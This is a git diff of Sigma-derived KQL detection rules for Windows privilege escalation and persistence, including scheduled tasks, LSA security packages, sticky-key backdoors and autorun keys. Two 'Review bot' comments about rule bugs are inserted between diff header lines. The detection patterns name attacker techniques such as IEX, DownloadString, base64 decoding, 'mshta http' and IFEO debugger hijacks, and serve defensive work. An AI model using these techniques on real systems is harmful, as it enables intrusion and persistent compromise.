-// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005
-
-DeviceRegistryEvents
+// Title: Scheduled TaskCache Change by Uncommon Program
+// Author: Syed Hasan (@syedhasan009)
+// Date: 2021-06-18
+// Level: high
+// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005
+
+DeviceRegistryEvents
 | where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*" and (not((RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor*") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or isnull(RegistryValueData) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", "C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe")) or (RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe" or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql
index ae15f223..59754001 100644
--- a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql
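Review bot: The opening predicate on the `| where` line, `RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*"`, can never be true because KQL `endswith` compares the literal string and the trailing `*` is not a wildcard, so this high-level rule produces no alerts; the explorer.exe exclusion ending in `Server Manager Performance Monitor*` has the same flaw. Replace the first predicate with `RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\"` and the exclusion with `RegistryKey contains "\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor"`. This looks like a converter artefact for a Sigma wildcard modifier rather than a hand-written condition, so the generator is worth checking for other emitted rules that carry `*` inside `endswith`/`=~` strings. The `RegistryValueData =~ "(Empty)"` exclusion is a Sysmon placeholder string; whether DeviceRegistryEvents ever carries that literal is not shown here, so confirm it against the tenant before relying on it.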
+++ b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql
@@ -1,10 +1,10 @@
-// Title: Schtasks Creation Or Modification With SYSTEM Privileges
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-28
-// Level: high
-// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
-
-DeviceProcessEvents
+// Title: Schtasks Creation Or Modification With SYSTEM Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-28
+// Level: high
+// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or (ProcessCommandLine contains "Subscription Heartbeat" and ProcessCommandLine contains "\\HeartbeatConfig.xml" and ProcessCommandLine contains "\\Microsoft Shared\\OFFICE") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql
index 3acf421e..8442867e 100644
--- a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql
+++ b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql
@@ -1,10 +1,10 @@
-// Title: Schtasks From Suspicious Folders
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-15
-// Level: high
-// Description: Detects scheduled task creations that have suspicious action command and folder combinations
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-
-DeviceProcessEvents
+// Title: Schtasks From Suspicious Folders
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-15
+// Level: high
+// Description: Detects scheduled task creations that have suspicious action command and folder combinations
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql
index 807837c3..5d816a7e 100644
--- a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql
+++ b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql
@@ -1,10 +1,10 @@
-// Title: Security Privileges Enumeration Via Whoami.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-05-05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
-
-DeviceProcessEvents
+// Title: Security Privileges Enumeration Via Whoami.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-05
+// Level: high
+// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.discovery, attack.t1033
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql
index 705f8198..46cb2c04 100644
--- a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql
+++ b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql
@@ -1,10 +1,10 @@
-// Title: Security Support Provider (SSP) Added to LSA Configuration
-// Author: iwillkeepwatch
-// Date: 2019-01-18
-// Level: high
-// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005
-
-DeviceRegistryEvents
+// Title: Security Support Provider (SSP) Added to LSA Configuration
+// Author: iwillkeepwatch
+// Date: 2019-01-18
+// Level: high
+// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005
+
+DeviceRegistryEvents
 | where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql
index f436c7d2..1a5cf50c 100644
--- a/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql
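Review bot: `Security Packages` is a value name under the `Lsa` and `Lsa\OSConfig` keys, and DeviceRegistryEvents reports value names in `RegistryValueName` while `RegistryKey` holds only the key path, so `RegistryKey endswith "\\Control\\Lsa\\Security Packages"` on the `| where` line is unlikely to match a real SSP registration and this high-level rule would stay silent. Suggested condition: `(RegistryKey endswith "\\Control\\Lsa" or RegistryKey endswith "\\Control\\Lsa\\OSConfig") and RegistryValueName =~ "Security Packages"`. This assumes the converter keeps the stock MDE schema, which nothing on this page contradicts; if its field mapping concatenates key and value name into `RegistryKey`, the rule works as written and this note can be dropped. The msiexec exclusion is path-only and ignores what was written, so consider keeping it but still surfacing writes whose data adds an entry outside the default package list.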
@@ -1,13 +1,13 @@
-// Title: Session Manager Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
-// - Legitimate administrator sets up autorun keys for legitimate reason
-
-DeviceRegistryEvents
+// Title: Session Manager Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, attack.t1546.009
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+// - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql
index f6d0eeb2..cf991af5 100644
--- a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql
+++ b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql
@@ -1,14 +1,14 @@
-// Title: Setup16.EXE Execution With Custom .Lst File
-// Author: frack113
-// Date: 2024-12-01
-// Level: medium
-// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
-// These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
-// Attackers and adversaries might leverage this as a living of the land utility.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005
-// False Positives:
-// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.
-
-DeviceProcessEvents
+// Title: Setup16.EXE Execution With Custom .Lst File
+// Author: frack113
+// Date: 2024-12-01
+// Level: medium
+// Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file.
+// These ".lst" file can contain references to external program that "Setup16.EXE" will execute.
+// Attackers and adversaries might leverage this as a living of the land utility.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005
+// False Positives:
+// - On modern Windows system, the "Setup16" utility is practically never used, hence false positive should be very rare.
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine contains " -m " and InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\setup16.exe") and (not(FolderPath startswith "C:\\~MSSETUP.T\\"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql
index 7560d036..06004f00 100644
--- a/KQL/rules/Privilege Escalation/startup_folder_file_write.kql
+++ b/KQL/rules/Privilege Escalation/startup_folder_file_write.kql
@@ -1,12 +1,12 @@
-// Title: Startup Folder File Write
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: medium
-// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate
-
-DeviceFileEvents
+// Title: Startup Folder File Write
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate
+
+DeviceFileEvents
 | where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) and (not((InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" and FolderPath endswith "\\Send to OneNote.lnk")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql
index 37ffef1f..9b6355fc 100644
--- a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql
+++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql
@@ -1,12 +1,12 @@
-// Title: Sticky Key Like Backdoor Execution
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018-03-15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Sticky Key Like Backdoor Execution
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql
index f9739905..a1f334e0 100644
--- a/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql
+++ b/KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql
@@ -1,12 +1,12 @@
-// Title: Sticky Key Like Backdoor Usage - Registry
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018-03-15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Sticky Key Like Backdoor Usage - Registry
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql
index 940fd4e4..5f62d985 100644
--- a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Autorun Registry Modified via WMI
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-02-17
-// Level: high
-// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047
-// False Positives:
-// - Legitimate administrative activity or software installations
-
-DeviceProcessEvents
+// Title: Suspicious Autorun Registry Modified via WMI
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-17
+// Level: high
+// Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047
+// False Positives:
+// - Legitimate administrative activity or software installations
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ")) and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or InitiatingProcessFolderPath endswith "\\wmiprvse.exe")) and ((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData'" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains ":\\Temp" or ProcessCommandLine contains 
"\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming" or ProcessCommandLine contains ":\\$Recycle.bin" or ProcessCommandLine contains ":\\Users\\Default" or ProcessCommandLine contains ":\\Users\\public" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%AppData%") or (ProcessCommandLine contains ":\\Users\\" and (ProcessCommandLine contains "\\Favorites" or ProcessCommandLine contains "\\Favourites" or ProcessCommandLine contains "\\Contacts" or ProcessCommandLine contains "\\Music" or ProcessCommandLine contains "\\Pictures" or ProcessCommandLine contains "\\Documents" or ProcessCommandLine contains "\\Photos")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql
index fabfa3f6..6eb95c3d 100644
--- a/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Command Patterns In Scheduled Task Creation
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-23
-// Level: high
-// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
-// False Positives:
-// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
-
-DeviceProcessEvents
+// Title: Suspicious Command Patterns In Scheduled Task Creation
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+// - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or 
ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql
index 644ebc14..30ca1cf2 100644
--- a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious desktop.ini Action
-// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
-// Date: 2020-03-19
-// Level: medium
-// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
-// False Positives:
-// - Operations performed through Windows SCCM or equivalent
-// - Read only access list authority
-
-DeviceFileEvents
+// Title: Suspicious desktop.ini Action
+// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
+// Date: 2020-03-19
+// Level: medium
+// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
+// False Positives:
+// - Operations performed through Windows SCCM or equivalent
+// - Read only access list authority
+
+DeviceFileEvents
 | where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql
index b804bf04..0cb317b0 100644
--- a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql
+++ b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql
@@ -1,14 +1,14 @@
-// Title: Suspicious Driver Install by pnputil.exe
-// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger
-// Date: 2021-09-30
-// Level: medium
-// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
-// False Positives:
-// - Pnputil.exe being used may be performed by a system administrator.
-// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
-// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
-
